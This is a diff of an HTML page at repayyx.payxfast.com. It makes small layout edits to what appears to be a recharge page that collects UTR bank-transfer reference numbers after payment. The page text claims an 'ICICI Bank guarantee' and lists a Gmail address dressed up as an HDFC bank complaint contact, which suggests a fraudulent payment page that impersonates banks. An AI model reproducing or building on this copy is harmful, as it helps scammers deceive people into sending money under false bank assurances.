--- a/repayyx.payxfast.com/index.html
+++ b/repayyx.payxfast.com/index.html
@@ -32,22 +32,22 @@
             <tr>
                 <td><input type="radio" class="rdaacls"></td>
                 <td><img src="https://i.ibb.co.com/K9cN6NJ/IMG-3882.png" alt="IMG-3882" class="gtwImgs"></td>
-            </tr>
+            </tr><br>
             <tr>
                 <td><input type="radio" class="rdaacls"></td>
                 <td><img src="https://i.ibb.co.com/dtpd8d8/IMG-3881.png" alt="IMG-3881" class="gtwImgs"></td>
-            </tr>
+            </tr><br>
             <tr>
                 <td><input type="radio" class="rdaacls"></td>
                 <td><img src="https://i.ibb.co.com/mHFzQyH/pngwing-com.png" class="gtwImgs"></td>
-            </tr>
+            </tr><br>
             <tr>
                 <td><input type="radio" class="rdaacls"></td>
                 <td><img src="https://i.ibb.co.com/XZyYVF0/IMG-3880.png" alt="IMG-3880" class="gtwImgs"></td>
-            </tr>
+            </tr><br>
         </table>
         <tr>
-        <p class="a1">↓ Fill the UTR numbers after you have done the payment ↓</p><br>
+        <p class="a1">↓ Fill the UTR numbers after you have done the payment ↓</p>
         <form method="post" onsubmit="return false;">
             UTR 
             <input type="text" name="utr" id="utrInput" class="inp" placeholder="Input UTR number"><br>
@@ -60,7 +60,7 @@
          <center>
         <p style="color: lightgray; font-size: 12px;">Dear customers: please give priority to this channel to recharge! Support UPI account withdrawal! ICICI Bank guarantee! Safe and reliable! If you have any questions, please contact: <br>
             
- <td style= "color:blue;font-size:10px;"> hdfcbankcomplaintacceptance@gmail.com</center>
+ <p style= "color:blue;font-size:10px;"> hdfcbankcomplaintacceptance@gmail.com</center>
         </p>
     </div>
 
